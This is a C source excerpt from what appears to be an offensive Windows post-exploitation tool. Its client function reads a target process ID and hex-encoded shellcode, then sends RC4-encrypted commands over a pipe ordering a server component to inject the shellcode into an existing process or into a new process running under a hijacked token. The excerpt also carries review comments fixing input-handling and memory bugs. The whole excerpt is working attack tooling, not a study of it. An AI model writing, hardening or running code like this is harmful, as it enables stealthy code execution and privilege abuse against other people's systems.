in client.c [411:460]
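/*
 * Interactive client step: reads a target PID and a hex-encoded payload from
 * stdin, wraps them in a shellcode_t, sends the command selected by
 * open_process/is_64 over `pipe` (RC4-protected, see comm_send_command) and
 * prints whatever packet the server answers with.
 *
 * open_process: true  -> OPEN_PROCESS_AND_INJECT_SHELLCODE_* command
 *               false -> CREATE_RANDOM_PROCESS_WITH_HIJACKED_TOKEN_* command
 * is_64:        selects the 64-bit or 32-bit variant of that command
 * pipe:         an open pipe handle; must not be INVALID_HANDLE_VALUE
 *
 * Fixes against the previous version:
 *  - "%u" matches the uint32_t PID (the old "%d" was a format mismatch);
 *  - a non-numeric token or EOF no longer spins forever in the PID loop,
 *    because scanf_s leaves the unparsed input in the stream;
 *  - the result of h_bytes_from_hexlified is checked before memcpy_s.
 * All heap buffers are released through a single cleanup label.
 */
void cl_inject_process(bool open_process, bool is_64, HANDLE pipe)
{
    assert(INVALID_HANDLE_VALUE != pipe);

    char hexlified_shellcode[MAX_SIZE] = { 0 };
    packet_t *packet = NULL;
    shellcode_t *shellcode = NULL;
    uint8_t *binary_shellcode = NULL;
    uint32_t target_pid = 0;
    size_t shellcode_size = 0;

    printf("Enter in existing PID: ");
    /* scanf_s returns 1 on a parsed number, 0 on a non-matching token (which
       stays in the buffer) and EOF when the stream is exhausted.  Drain the
       rest of the line on a bad token so the prompt is shown once per line
       instead of looping without ever consuming input. */
    while (scanf_s("%u", &target_pid) != 1 || target_pid == 0) {
        if (feof(stdin) || ferror(stdin)) {
            /* h_error is expected to terminate the process; the goto keeps
               the cleanup path correct if it ever returns — TODO confirm. */
            h_error("Failed to read a PID from stdin\n");
            goto cleanup;
        }
        int ch;
        while ((ch = getchar()) != '\n' && ch != EOF) {
            /* discard the remainder of the invalid line */
        }
        printf("Please enter a valid PID\n");
    }

    h_get_user_string("Enter in shellcode: ", hexlified_shellcode, MAX_SIZE);

    /* Ownership of binary_shellcode passes to this function (freed below).
       A NULL result presumably means malformed hex — verify against the helper. */
    binary_shellcode = h_bytes_from_hexlified(hexlified_shellcode, &shellcode_size);
    if (!binary_shellcode) {
        h_error("Failed to decode the shellcode hex string\n");
        goto cleanup;
    }

    /* shellcode_t carries a trailing variable-length buffer; allocate header
       plus payload in one block.  shellcode_size is bounded by MAX_SIZE/2, so
       the uint32_t length cast in comm_send_command below cannot truncate. */
    shellcode = calloc(1, sizeof *shellcode + shellcode_size);
    if (!shellcode) {
        h_error("Failed to allocate shellcode memory\n");
        goto cleanup;
    }
    shellcode->pid = target_pid;
    memcpy_s(shellcode->buffer, shellcode_size, binary_shellcode, shellcode_size);

    /* Pick the command constant for the requested mode and architecture. */
    comm_send_command(
        pipe,
        open_process
            ? (is_64
                   ? OPEN_PROCESS_AND_INJECT_SHELLCODE_64BITS
                   : OPEN_PROCESS_AND_INJECT_SHELLCODE_32BITS)
            : (is_64
                   ? CREATE_RANDOM_PROCESS_WITH_HIJACKED_TOKEN_AND_INJECT_SHELLCODE_64BITS
                   : CREATE_RANDOM_PROCESS_WITH_HIJACKED_TOKEN_AND_INJECT_SHELLCODE_32BITS),
        (uint8_t *)shellcode, (uint32_t)(sizeof *shellcode + shellcode_size),
        RC4_KEY, RC4_KEY_LENGTH);

    /* NOTE(review): comm_receive_packet may return NULL; cl_print_packet is
       handed it unconditionally, as before — confirm it tolerates NULL. */
    packet = comm_receive_packet(pipe);
    cl_print_packet(packet);

cleanup:
    /* free(NULL) is a no-op, so no guards are needed on any path. */
    free(packet);
    free(shellcode);
    free(binary_shellcode);
}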